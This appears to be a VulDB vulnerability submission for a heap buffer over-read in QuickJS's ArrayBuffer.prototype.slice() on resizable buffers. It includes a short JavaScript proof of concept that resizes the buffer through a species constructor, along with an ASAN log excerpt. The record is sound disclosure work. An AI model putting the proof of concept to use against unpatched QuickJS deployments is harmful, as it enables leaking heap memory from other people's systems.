| Title | Fabrice Bellard QuickJS Latest commit eb2c890 (and earlier versions) Memory Corruption |
|---|
| Description | A heap buffer overflow vulnerability exists in ArrayBuffer.prototype.slice() for resizable ArrayBuffers.
The following proof-of-concept triggers the issue:
let buf = new ArrayBuffer(1000, { maxByteLength: 2000 });
Object.defineProperty(buf.constructor, Symbol.species, {
value: function(len) {
buf.resize(100);
return new ArrayBuffer(len);
}
});
buf.slice(500, 1000);
The vulnerability is a Time-of-Check-Time-of-Use (TOCTOU, CWE-367) condition where the
species constructor resizes the buffer mid-operation. The subsequent memcpy()
uses stale offset values calculated before the resize, resulting in an
out-of-bounds read of 400+ bytes beyond the allocated heap buffer.
ASAN logs:
ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b000002b74 at pc 0x7f41b0c4814b bp 0x7ffc17851450 sp 0x7ffc17850c00
READ of size 500 at 0x60b000002b74 thread T0 [...]
Impact: Information disclosure through heap memory leak (CWE-125: Out-of-bounds Read)
Affected Implementations:
- bellard/quickjs (issue #451)
- quickjs-ng/quickjs (issue #1210)
Credits: Iacob Razvan Mihai |
|---|
| Source | ⚠️ https://github.com/bellard/quickjs/issues/451 |
|---|
| User | im-razvan (UID 91857) |
|---|
| Submission | 10/21/2025 01:27 (8 months ago) |
|---|
| Moderation | 11/05/2025 14:54 (16 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 331268 [QuickJS up to eb2c89087def1829ed99630cb14b549d7a98408c quickjs.c js_array_buffer_slice buffer over-read] |
|---|
| Points | 20 |
|---|